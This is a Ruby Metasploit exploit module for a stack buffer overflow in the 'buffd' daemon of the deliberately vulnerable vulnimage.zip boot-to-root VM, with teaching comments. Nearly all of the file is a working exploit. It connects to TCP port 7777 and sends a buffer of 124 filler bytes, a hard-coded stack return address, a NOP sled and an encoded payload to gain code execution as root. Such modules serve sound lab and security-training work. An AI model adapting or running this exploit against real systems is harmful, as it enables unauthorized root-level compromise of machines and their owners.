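# Template: http://dev.metasploit.com/redmine/projects/framework/wiki/DeveloperGuide#A23-Exploit
require 'msf/core'

# Metasploit module for the 'buffd' daemon shipped in the deliberately
# vulnerable vulnimage.zip boot-to-root image.
#
# The module connects to the configured RPORT (default 7777), sends a fixed
# overflow buffer whose return address is hard-coded per target, and relies on
# a NOP sled to land in the payload. Because the return address is a constant
# stack address for one specific VM image, the module is only expected to work
# against that image (useful as a teaching example of a non-ASLR stack overflow).
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] module info supplied by the framework (merged via update_info)
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VulnImage.zip Stack Buffer Overflow (\'buffd\' Daemon)',
      'Description'    => %q{
        A simple exploit for the 'boot to root', vulnimage.zip.
        The vulnerability is in daemon service, 'buffd', which runs as root at startup.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'g0tmi1k' ],
      'Version'        => '$Revision: 1 $',
      'References'     =>
        [
          [ 'Download', 'http://ds.mathematik.uni-marburg.de/~lbaumgaertner/vulnimage.zip' ],
        ],
      'Payload'        =>
        {
          'Space'    => 672,
          'BadChars' => "\x00\xff",
        },
      'Platform'       => 'lin',
      'Targets'        =>
        [
          # Direct stack address pointing into the NOP sled; valid only for this VM image.
          [ 'VulnImage.zip Virtual Machine', { 'Ret' => 0xbffff380 } ]
        ],
      'DisclosureDate' => 'Nov 17 2011',
      'DefaultOptions' =>
        {
          'RPORT'    => '7777',
          'EXITFUNC' => 'process',
        },
      'DefaultTarget'  => 0,
      # Listed once: the original info hash repeated this key, which Ruby
      # reports as a duplicated (and silently overwritten) hash key.
      'Privileged'     => false
    ))
  end

  # The module does not probe the remote service at all, so it has no basis
  # for reporting the target as vulnerable. Returning Unknown (rather than the
  # unconditional Vulnerable the original returned) keeps scan and audit
  # results honest; a real check would have to fingerprint the buffd service.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    Exploit::CheckCode::Unknown
  end

  # Builds and sends the overflow buffer, then hands control to the payload
  # handler. Layout, in order: 124 filler bytes, the target return address
  # packed little-endian, a 30-byte NOP sled, and the encoded payload. The 124
  # byte offset is taken as given from the original module; it is not
  # derivable from this file.
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    buf = 'A' * 124                      # filler; offset presumed to reach the saved return address
    buf << [ target.ret ].pack('V')      # overwrite with the target's fixed stack address
    buf << make_nops(30)                 # sled tolerates small inaccuracies in 'Ret'
    buf << payload.encoded

    sock.put(buf)
    sock.get
    handler
    disconnect
  end
end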